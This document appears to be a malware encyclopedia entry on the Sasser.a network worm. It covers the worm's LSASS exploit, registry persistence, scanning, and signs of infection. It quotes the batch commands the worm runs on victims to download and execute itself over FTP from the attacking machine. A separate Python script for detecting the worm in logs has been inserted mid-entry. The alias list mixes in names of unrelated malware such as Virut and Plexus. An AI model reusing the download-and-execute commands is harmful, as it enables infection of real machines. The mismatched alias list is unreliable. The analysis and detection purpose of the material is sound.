
Net-Worm.Win32.Sasser.a

Detected May 01 2004 18:41 GMT
Released May 01 2004 18:41 GMT
Published May 11 2004 10:54 GMT

Technical Details

Sasser is an Internet worm that exploits the MS Windows LSASS vulnerability described in Microsoft Security Bulletin MS04-011.

Microsoft released a patch for this vulnerability on April 13, 2004, while Sasser.a was first detected on April 30, 2004.

Sasser operates in a very similar manner to Lovesan, except that Lovesan exploited a vulnerability in the RPC DCOM service rather than the LSASS service.

Sasser affects computers running Windows 2000, Windows XP and Windows Server 2003. Sasser runs on all other versions of Windows but cannot infect them by attacking via the vulnerability.

Sasser is written in C/C++, using the Visual C compiler. The worm is about 15 KB in size and is packed with PECompact2.

Signs of Infection

  • The file 'avserve.exe' in the Windows directory.
  • An error message about the LSASS service failing, which usually also causes the system to reboot.

Propagation

After launching, Sasser copies itself into the Windows root directory under the name avserve.exe and registers this file in the system registry autorun key:

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
 "avserve.exe" = "%WINDIR%\avserve.exe"

Sasser creates a unique identifier, 'Jobaka31', in memory so that it can detect a copy of itself that is already running during later infection attempts.

Sasser launches an FTP server on TCP port 5554 and then launches 128 propagation routines. During this process, the worm attempts to call the AbortSystemShutdown function in order to prevent the system from rebooting.

Sasser scans IP addresses in order to identify victims, sending a request to TCP port 445 on each. If a machine responds, Sasser exploits the LSASS vulnerability to launch a 'cmd.exe' command shell on TCP port 9996. Finally, Sasser commands the infected machine to download and launch the main worm component under the name "N_up.exe", where "N" is a random number:

echo off
echo open [attacking machine address] 5554>>cmd.ftp
echo anonymous>>cmd.ftp
echo user
echo bin>>cmd.ftp
echo get [random number]_up.exe>>cmd.ftp
echo bye>>cmd.ftp
echo on
ftp -s:cmd.ftp
[random number]_up.exe
echo off
del cmd.ftp
echo on

As a result, one machine may be attacked more than once and contain multiple copies of the worm with sample names such as:

23101_up.exe
5409_up.exe

and so forth.
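The propagation sequence above (a TCP/445 scan across many hosts, a shell on TCP/9996 on each victim, and the victim pulling the worm from the attacker's TCP/5554 FTP server) is visible in plain connection logs. The following Python script is an added example, not part of the Kaspersky description; its one-flow-per-line log format, the sample lines and the scan threshold are assumptions.

```python
from collections import defaultdict

# Constructed sample connection log, one flow per line: "src_ip dst_ip dst_port".
# The format is an assumption for this example, not a real firewall format.
SAMPLE_LOG = """\
10.0.0.5 10.0.0.21 445
10.0.0.5 10.0.0.22 445
10.0.0.5 10.0.0.23 445
10.0.0.5 10.0.0.24 445
10.0.0.5 10.0.0.25 445
10.0.0.5 10.0.0.26 445
10.0.0.5 10.0.0.22 9996
10.0.0.22 10.0.0.5 5554
10.0.0.9 10.0.0.30 445
10.0.0.9 10.0.0.31 80
"""

SCAN_THRESHOLD = 5  # distinct TCP/445 targets before a source counts as scanning (assumed)

def parse_log(text):
    for line in text.splitlines():
        if line.strip():
            src, dst, port = line.split()
            yield src, dst, int(port)

def find_sasser_sources(text, threshold=SCAN_THRESHOLD):
    """Return {source_ip: finding} for hosts whose flows match the Sasser sequence."""
    targets_445 = defaultdict(set)  # scanner -> hosts it probed on 445
    shells_9996 = defaultdict(set)  # attacker -> victims whose 9996 shell it reached
    ftp_clients = defaultdict(set)  # attacker -> victims that fetched from its 5554 FTP
    for src, dst, port in parse_log(text):
        if port == 445:
            targets_445[src].add(dst)
        elif port == 9996:
            shells_9996[src].add(dst)
        elif port == 5554:
            ftp_clients[dst].add(src)  # the victim (src) connects back to the attacker (dst)
    findings = {}
    for src, probed in targets_445.items():
        if len(probed) < threshold:
            continue
        shells = sorted(shells_9996[src])
        downloads = sorted(ftp_clients[src] & shells_9996[src])  # victims that completed the pull
        stage = "scan+shell+download" if downloads else "scan+shell" if shells else "scan"
        findings[src] = {"scanned": len(probed), "shells": shells,
                         "downloads": downloads, "stage": stage}
    return findings
```

A host that reaches "scan+shell+download" has shown all three steps the worm takes; a "scan" only match on its own is a weaker signal and may be a legitimate SMB client.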

Other

After infection, the victim machine generates an error message about an LSASS service failure, whereupon it may attempt to reboot.

Sasser creates the file 'win.log' in the root directory of the C drive, where the worm records the IP addresses of all attacked machines.


Net-Worm

Net-Worms propagate via computer networks. The distinguishing feature of this type of worm is that it does not require user action in order to spread.

This type of worm usually searches for critical vulnerabilities in software running on networked computers. In order to infect the computers on the network, the worm sends a specially crafted network packet (called an exploit), and as a result the worm code (or part of it) penetrates the victim computer and activates. Sometimes the network packet contains only the part of the worm code that downloads and runs a file containing the main worm module. Some network worms use several exploits simultaneously to spread, thus increasing the speed at which they find victims.


Aliases

Net-Worm.Win32.Sasser.a (Kaspersky Lab) is also known as:

  • Worm.Win32.Sasser.a (Kaspersky Lab)
  • Virus: W32/Virut.gen.a (McAfee)
  • W32/Virut-W (Sophos)
  • W32.Virut-54 (ClamAV)
  • W32/Sasser.C.worm (Panda)
  • W32/Sasser.B (FPROT)
  • Virus:Win32/Virut.AC (MS(OneCare))
  • Win32.Virut.30 (DrWeb)
  • Win32/Virut.AV virus (Nod32)
  • Win32.Worm.Sasser.B (BitDef7)
  • I-Worm.Sasser.B (VirusBuster)
  • Email-Worm.Win32.Plexus (Ikarus)
  • I-Worm/Sasser.H (AVG)
  • W32/Virut.AX (AVIRA)
  • W32.Sasser.C.Worm (NAV)
  • Sasser.B (Norman)
  • Win32.Virut.an (Rising)
  • Net-Worm.Win32.Sasser.a [AVP] (FSecure)
  • PE_VIRUT.AV (TrendMicro)
  • I-Worm.Sasser.B (VirusBusterBeta)